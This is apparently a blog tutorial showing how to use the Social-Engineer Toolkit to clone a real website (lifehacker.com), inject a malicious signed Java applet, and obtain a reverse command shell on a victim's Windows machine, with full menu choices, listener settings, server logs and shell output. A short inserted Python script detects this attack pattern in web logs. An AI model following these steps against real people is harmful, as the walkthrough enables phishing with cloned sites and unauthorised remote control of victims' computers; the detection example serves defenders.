In a previous post we saw how to exploit remote Windows machines using the Metasploit Java signed applet exploit together with some social engineering of the user. In this post we try a similar hack using the Social-Engineer Toolkit. The Social-Engineer Toolkit (SET) is an exploitation framework for social engineering attacks such as phishing.
Launch SET. In BackTrack it can be found under BackTrack > Exploitation Tools > Social Engineering Tools > Social Engineering Toolkit > set, or launch it from the terminal:
[email protected]:~# cd /pentest/exploits/set/
[email protected]:/pentest/exploits/set# ./set

The main menu will come up:
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit

Select option #1, Social-Engineering Attacks, to move on to the next menu:
Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.

From this menu select option #2, Website Attack Vectors. The next menu lists the attack methods along with their descriptions:
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate
99) Return to Main Menu
Select the first option, Java Applet Attack Method.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu

Now SET asks whether it should use a webpage from its existing list of templates or clone a website and prepare it for the attack. Select 2) Site Cloner. After this SET asks for some information:
set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address for the reverse connection:192.168.1.7
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:lifehacker.com
[*] Cloning the website: http://lifehacker.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: FL8khGiXAvaXu7
[*] Malicious java applet website prepped for deployment
First it asks whether NAT is needed. If the victim is outside your own network, that is, over the internet, while you are behind a router on your LAN, then NAT is needed. In our case the victim is on the same LAN, so I entered no for NAT.
Next it asks for the IP address for the reverse connection. This is the IP address the victim machine will connect back to in order to provide the shell, so it should be the reachable IP of the hacker's machine, i.e. where SET is running.
Then SET asks for the URL to clone. We entered lifehacker.com. SET clones it, creates a look-alike copy of lifehacker.com and injects the Java attack applet into it. Cloning an existing website makes the page more convincing, since the victim sees a familiar site and may take it for the genuine one.
After all this, SET finally asks for the payload to use:
What payload do you want to generate:

  Name:                                        Description:

   1) Windows Shell Reverse_TCP                Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter          Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL              Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                       Execute payload and create an accepting port on remote system
   5) Windows Bind Shell X64                   Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64            Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64      Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster        Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS        Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS          Use a hostname instead of an IP address and spawn Meterpreter
  11) SE Toolkit Interactive Shell             Custom interactive reverse toolkit designed for SET
  12) SE Toolkit HTTP Reverse Shell            Purely native HTTP shell with AES encryption support
  13) RATTE HTTP Tunneling Payload             Security bypass payload that will tunnel all comms over HTTP
  14) ShellCodeExec Alphanum Shellcode         This will drop a meterpreter payload through shellcodeexec (A/V Safe)
  15) Import your own executable               Specify a path for your own executable

Briefly, the payload is the part of the code that provides the final shell once the exploitation step has succeeded. The most commonly used payload is the reverse TCP shell, but here we are going to try a different one, the SE Toolkit Interactive Shell, option 11.
set:payloads>11
set:payloads> PORT of the listener :443
[*] Done, moving the payload into the action.
[-] Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...
[*] Stager turned off, prepping direct download payload...
[*] Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, IE9, IE10, Safari, Opera, Chrome, and FireFox [--]

[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching the SET Interactive Shell...
[*] Crypto.Cipher library is installed. AES will be used for socket communication.
[*] All communications will leverage AES 256 and randomized cipher-key exchange.
[*] The Social-Engineer Toolkit (SET) is listening on: 0.0.0.0:443

Once SET is listening, it's time to open the URL in the victim's browser, i.e. browse to the IP address of the hacker's computer from the victim computer. The browser asks to run Java and then pops up a confirmation dialog.
Once the victim user clicks Run and allows the applet to run, the hacker machine gets a shell on the victim computer:
192.168.1.2 - - [18/Apr/2013 20:59:18] "GET / HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:18] code 404, message File not found
192.168.1.2 - - [18/Apr/2013 20:59:18] "GET /favicon.ico HTTP/1.1" 404 -
192.168.1.2 - - [18/Apr/2013 20:59:22] code 404, message File not found
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar.pack.gz HTTP/1.1" 404 -
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:54] "GET /Gc4pPU HTTP/1.1" 200 -
[*] Connection received from: 192.168.1.2

*** Pick the number of the shell you want ***

1: 192.168.1.2:WINDOWS
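The request sequence in that log is also what a defender can look for: a signed .jar served to a client, followed shortly by a fetch of a short extensionless random path once the user has clicked Run. The script below is an added detection example, not code from the original post or from SET; it assumes the log layout shown above, a constructed second client (192.168.1.9) that only browsed the page, and the path pattern and five-minute window are assumptions, not SET's documented behaviour.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines, in the format SET's built-in web server prints above;
# a proxy log would carry the same request sequence in a different layout.
SAMPLE_LOG = """\
192.168.1.2 - - [18/Apr/2013 20:59:18] "GET / HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:18] code 404, message File not found
192.168.1.2 - - [18/Apr/2013 20:59:18] "GET /favicon.ico HTTP/1.1" 404 -
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar.pack.gz HTTP/1.1" 404 -
192.168.1.2 - - [18/Apr/2013 20:59:22] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.1.2 - - [18/Apr/2013 20:59:54] "GET /Gc4pPU HTTP/1.1" 200 -
192.168.1.9 - - [18/Apr/2013 21:03:01] "GET / HTTP/1.1" 200 -
192.168.1.9 - - [18/Apr/2013 21:03:02] "GET /about.html HTTP/1.1" 200 -
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
RANDOM_PATH_RE = re.compile(r'^/[A-Za-z0-9]{6,20}$')  # assumed: extensionless name such as /Gc4pPU

def parse(log_text):
    """Yield (ip, timestamp, method, path, status) for every parseable request line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:  # 'code 404, message File not found' lines carry no request; skip them
            continue
        ts = datetime.strptime(m['ts'], '%d/%b/%Y %H:%M:%S')
        yield m['ip'], ts, m['method'], m['path'], int(m['status'])

def find_applet_stagers(log_text, window=timedelta(minutes=5)):
    """Flag clients that were served a .jar and then, within `window`, fetched an
    extensionless random-looking path: the sequence a user clicking Run produces."""
    last_jar = {}  # ip -> time the signed applet was served (HTTP 200)
    alerts = []
    for ip, ts, method, path, status in parse(log_text):
        if method != 'GET' or status != 200:
            continue  # the failed .jar.pack.gz probe and favicon 404s are noise
        if path.lower().endswith('.jar'):
            last_jar[ip] = ts
        elif ip in last_jar and RANDOM_PATH_RE.match(path) and ts - last_jar[ip] <= window:
            alerts.append({'client': ip, 'applet_at': last_jar[ip].isoformat(),
                           'payload_path': path, 'payload_at': ts.isoformat()})
    return alerts

if __name__ == '__main__':
    for a in find_applet_stagers(SAMPLE_LOG):
        print(f"[ALERT] {a['client']} was served a signed applet at {a['applet_at']} "
              f"and fetched {a['payload_path']} at {a['payload_at']}")
```

Only 192.168.1.2 is flagged; the second client fetched the page but never the applet, so it produces no alert.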
Now type 1 and hit Enter:

set> 1
[*] Dropping into the Social-Engineer Toolkit Interactive Shell.
set:active_target>

This is the SET interactive shell. Type help and hit Enter to see the options this shell offers. To get the native OS shell, type shell and hit Enter:
set:active_target>shell
[*] Entering a Windows Command Prompt. Enter your commands below.
set:active_target:shell>dir
 Volume in drive C has no label.
 Volume Serial Number is FC18-53D3

 Directory of C:\Documents and Settings\enlightened\Local Settings\Application Data\Google\Chrome\Application\26.0.1410.64

04/15/2013  02:46 AM    <DIR>          .
04/15/2013  02:46 AM    <DIR>          ..
04/09/2013  01:56 AM        44,521,424 chrome.dll
04/09/2013  01:07 AM           882,175 chrome_100_percent.pak
04/09/2013  01:56 AM            57,296 chrome_frame_helper.dll
04/09/2013  01:56 AM            82,896 chrome_frame_helper.exe
................
This Java applet based attack is not actually an exploit; it relies on the same mechanism as browser-based Java remote desktop solutions: a signed applet that the user approves is allowed to run with that user's privileges, that's all. It can nevertheless be used by hackers against users who do not recognise the phishing page and click Run without understanding the consequences.